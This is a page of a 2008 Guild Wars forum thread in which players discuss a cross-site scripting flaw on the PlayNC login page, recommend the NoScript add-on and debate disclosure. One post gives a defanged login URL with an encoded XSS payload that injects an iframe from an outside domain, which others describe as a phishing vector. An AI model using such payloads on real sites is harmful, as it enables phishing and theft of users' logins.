Guild Wars Forums - GW Guru
 
 

Go Back   Guild Wars Forums - GW Guru > The Inner Circle > The Riverside Inn

Notices

Reply
 
Thread Tools Display Modes
Old May 05, 2008, 08:27 PM // 20:27   #41
Academy Page
 
Join Date: Nov 2007
Guild: Hand of the Divine [HOLY]
Profession: W/A
Advertisement

Disable Ads
Default

Quote:
Originally Posted by lyra_song
*pats No Script*
best add-on ever
derc is offline   Reply With Quote
Old May 05, 2008, 08:41 PM // 20:41   #42
Lion's Arch Merchant
 
Join Date: Dec 2007
Guild: [LOD]
Profession: R/
Default

Doesn't work anymore? It did before, but I just checked it and it takes me to the login page now, I even changed the stuff after the language=
Kapral is offline   Reply With Quote
Old May 05, 2008, 08:43 PM // 20:43   #43
Hell's Protector
 
lyra_song's Avatar
 
Join Date: Oct 2005
Profession: R/Mo
Default

Remember folks.

http://noscript.net/

Browse with control. Its a firefox plugin.

No Script blocks Javascript/Java/Flash on EVERY page.

Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that).

USE IT NOW.
lyra_song is offline   Reply With Quote
Old May 05, 2008, 08:56 PM // 20:56   #44
Academy Page
 
Serenity Divinity's Avatar
 
Join Date: Jul 2007
Profession: E/
Default

Quote:
Originally Posted by lyra_song
*pats No Script*
same here
Serenity Divinity is offline   Reply With Quote
Old May 05, 2008, 09:07 PM // 21:07   #45
Guest
 
Join Date: Jan 2007
Default

-but yeah no script is just one of them. if you use it, gogo you!
another one I use faithfully...
http://qfxsoftware.com/
and I must add...lol.. no script has told it's users about this sort of thing for quite some time via pop-up/error console.
Attached Images
File Type: jpg noscript.jpg (49.9 KB, 61 views)
File Type: jpg noscript1.jpg (20.9 KB, 57 views)

Last edited by gone; May 05, 2008 at 09:46 PM // 21:46..
gone is offline   Reply With Quote
Old May 05, 2008, 09:14 PM // 21:14   #46
Krytan Explorer
 
Join Date: Sep 2007
Location: somewhere on earth!
Profession: E/Me
Default

i dont see any problems cause im using firefox the only problem is that they havnt changed the 2007 on the bottom to 2008 or 2009.
warcrap is offline   Reply With Quote
Old May 05, 2008, 09:21 PM // 21:21   #47
Hustler
 
I MP I's Avatar
 
Join Date: Nov 2006
Location: in between GW2 servers
Profession: Mo/
Default

Wonder if all these people claiming to have been hacked were with this method. Either way I'm going to go have some drinks.
I MP I is offline   Reply With Quote
Old May 05, 2008, 09:22 PM // 21:22   #48
Furnace Stoker
 
Join Date: Jul 2006
Default

they fixed it, me thinks.
DarkNecrid is offline   Reply With Quote
Old May 05, 2008, 09:23 PM // 21:23   #49
Lion's Arch Merchant
 
Karuro's Avatar
 
Join Date: Apr 2008
Location: The Netherlands, Europe
Guild: Mystic Spiral [MYST]
Profession: W/
Default

Quote:
Originally Posted by warcrap
i dont see any problems cause im using firefox the only problem is that they havnt changed the 2007 on the bottom to 2008 or 2009.
They fixed it already, I think.
Or someone can try to do the previous again to see if they fixed the actual problem.
Karuro is offline   Reply With Quote
Old May 05, 2008, 10:31 PM // 22:31   #50
Underworld Spelunker
 
MithranArkanere's Avatar
 
Join Date: Nov 2006
Location: wikipedia.org/wiki/Vigo
Guild: Heraldos de la Llama Oscura [HLO]
Profession: E/
Default

My FireFox has anti XSS exploit subroutines, so I don't care a bout that.
MithranArkanere is offline   Reply With Quote
Old May 05, 2008, 10:38 PM // 22:38   #51
rattus rattus
 
Snograt's Avatar
 
Join Date: Jan 2006
Location: London, UK GMT±0 ±1hr DST
Guild: [GURU]GW [wiki]GW2
Profession: R/
Default

Heh, nice.

You seem to have made bugchasing on NCSoft and ANet sites a personal crusade, eh Pablo?

[edit] Hmm, got paranoid enough to install NoScript. Who or what is Quantserve.com?

[edit2] nvm -
Quote:
Originally Posted by quantserve redirect to quantcast.com
What is Quantcast?
From Quantcast
Quantcast is the World’s Only Open Internet Ratings Service

Quantcast is a new media measurement service that lets advertisers view audience reports on millions of websites and services. Only Quantcast combines directly measured audience data with panel-based estimates to deliver accurate third-party metrics and easy-to-read profiles on digital media properties.
Advertisers – Find an Audience!

View detailed audience reports for millions of websites and services to find the audiences you seek and build your brand online with confidence.
Publishers – Make Your Audience Count!

Demonstrate the unique value of your audiences and attract advertisers by tagging your websites, videos, widgets and games for direct measurement.
__________________
Si non confectus, non reficiat

Last edited by Snograt; May 05, 2008 at 10:46 PM // 22:46..
Snograt is offline   Reply With Quote
Old May 05, 2008, 11:34 PM // 23:34   #52
Krytan Explorer
 
rohara's Avatar
 
Join Date: Nov 2006
Profession: Rt/
Default

Quote:
Originally Posted by lyra_song
Remember folks.

http://noscript.net/

Browse with control. Its a firefox plugin.

No Script blocks Javascript/Java/Flash on EVERY page.

Its good protection against XSS hacks, and other script based nuisances. But you will have to set all your favorite sites to "allow" or else you can't browse normally (no mouseovers, etc). Otherwise its a good warning/protection system (unless you get DNS hacked...but lets not get into that).

USE IT NOW.
you noscript fanatics are missing out on a lot of sweet ajax implements...just sayin. javascript isn't evil.


...


anyways. as a web developer, this makes me QQ. for shame, plaync!
rohara is offline   Reply With Quote
Old May 06, 2008, 01:00 AM // 01:00   #53
rattus rattus
 
Snograt's Avatar
 
Join Date: Jan 2006
Location: London, UK GMT±0 ±1hr DST
Guild: [GURU]GW [wiki]GW2
Profession: R/
Default

Sure, javascript isn't evil. Neither are guns...
__________________
Si non confectus, non reficiat
Snograt is offline   Reply With Quote
Old May 06, 2008, 01:31 AM // 01:31   #54
Desert Nomad
 
Stockholm's Avatar
 
Join Date: Feb 2006
Location: Censored
Guild: Censored
Profession: R/
Default

hxxps://secure.plaync.com/cgi-bin/plaync_login.pl?language="%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%3E%57%48%59%3F%21 %20%57%68%79%20%64%6F%65%73%20%50%6C%61%79%4E%43%2 0%68%61%76%65%20%61%6E%20%58%53%53%20%66%6C%61%77% 20%72%69%67%68%74%20%6F%6E%20%74%68%65%69%72%20%6C %6F%67%69%6E%20%70%61%67%65%3F%3C%69%66%72%61%6D%6 5%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61% 79%6E%63%2E%6A%75%73%74%67%6F%74%6F%77%6E%65%64%2E %63%6F%6D%22%20%77%69%64%74%68%3D%22%31%30%30%25%2 2%20%65%69%67%68%74%3D%22%31%30%30%25%22%3E%3C%2F% 69%66%72%61%6D%65%3E%3C%6E%6F%66%72%61%6D%65%73%3E

No change so far, still same as earlier.
Stockholm is offline   Reply With Quote
Old May 06, 2008, 05:00 AM // 05:00   #55
Jungle Guide
 
Kashrlyyk's Avatar
 
Join Date: May 2005
Default

Quote:
Originally Posted by Kashrlyyk
Thanks that worked!
Doesn´t work for me anymore, so hopefully they actually fixed it.
Kashrlyyk is offline   Reply With Quote
Old May 06, 2008, 07:46 AM // 07:46   #56
Grotto Attendant
 
zwei2stein's Avatar
 
Join Date: Jun 2006
Location: Europe
Guild: The German Order [GER]
Profession: N/
Default

Quote:
Originally Posted by slowerpoke
if this is an expolit you should prolly report it to them and not advertise it here
You don't get exploits fixed in timely matter that way.
zwei2stein is offline   Reply With Quote
Old May 06, 2008, 07:55 AM // 07:55   #57
Desert Nomad
 
Join Date: Apr 2007
Default

Quote:
Originally Posted by rohara
you noscript fanatics are missing out on a lot of sweet ajax implements...just sayin. javascript isn't evil.
You don't miss out on anything by using NoScript. It simply gives you control over what is allowed to run in your browser. It blocks everything by default, but if you want to see something on a page (and you trust it), you can choose to allow it.
Riot Narita is offline   Reply With Quote
Old May 06, 2008, 01:07 PM // 13:07   #58
Krytan Explorer
 
Friday's Avatar
 
Join Date: Oct 2006
Guild: [DVDF]
Default

Quote:
Originally Posted by Hissy
You don't miss out on anything by using NoScript. It simply gives you control over what is allowed to run in your browser. It blocks everything by default, but if you want to see something on a page (and you trust it), you can choose to allow it.
Precisely. NoScript runs a small icon on the bottom task bar of your browser and if you wish to see the scripts on a page you trust you can simply click on the small icon and "allow" scripts for the relevant page. That page/site then goes into NoScript's "white list" and you will be able to view scripts on that page in the future without having to "re-do" the permission. Or you can "temporarily allow" scripts for that page and the permission will expire when you leave the page.

The add-ons for Firefox also have a cookie blocker, java blocker and others that I use, which function in exactly the same way. It gives ME the choice of what I wish to get dumped on me, not the other way round.
Friday is offline   Reply With Quote
Old May 06, 2008, 03:53 PM // 15:53   #59
Krytan Explorer
 
ducktape's Avatar
 
Join Date: Jul 2005
Profession: W/R
Default

Ok, I got to the party a bit late and missed most of this, but I am wondering...was it a redirect/phish combo, or was PlayNC lazy with cookie validation and made it so that someone could steal the PlayNC session cookie off -your- machine and use that stolen cookie on -their- machine to log in to PlayNC under -your- PlayNC account using the stolen session cookie?

The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts.

Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it!
ducktape is offline   Reply With Quote
Old May 06, 2008, 04:50 PM // 16:50   #60
Grotto Attendant
 
Join Date: Apr 2007
Default

Quote:
Originally Posted by ducktape
Ok, I got to the party a bit late and missed most of this, but I am wondering...was it a redirect/phish combo, or was PlayNC lazy with cookie validation and made it so that someone could steal the PlayNC session cookie off -your- machine and use that stolen cookie on -their- machine to log in to PlayNC under -your- PlayNC account using the stolen session cookie?

The second option is like the big hotmail hackings from a couple years ago, so shame shame SHAME on them if that's what happened to peoples' PlayNC accounts.

Also, thanks Pablo for pointing out the PlayNC security problem to everyone so that PlayNC would do something about it!
It was a cross-site script/phish combo. Or at least that was the most obvious application.
Chthon is offline   Reply With Quote
Reply

Share This Forum!  
 
 
           

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Seraphim of Chaos The Riverside Inn 23 Dec 04, 2006 11:33 AM // 11:33
3 man build for Oro/FA (pic of proof) skreet preacha The Campfire 16 May 29, 2006 09:24 PM // 21:24
3 man build for Oro/FA (pic of proof) skreet preacha The Campfire 11 Apr 26, 2006 03:12 PM // 15:12
Shanaeri Rynale Screenshot Exposition 10 Jan 13, 2006 11:58 PM // 23:58


All times are GMT. The time now is 09:31 PM // 21:31.


Powered by: vBulletin
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd.
jQuery(document).ready(checkAds()); function checkAds(){if (document.getElementById('adsense')!=undefined){document.write("_gaq.push(['_trackEvent', 'Adblock', 'Unblocked', 'false',,true]);");}else{document.write("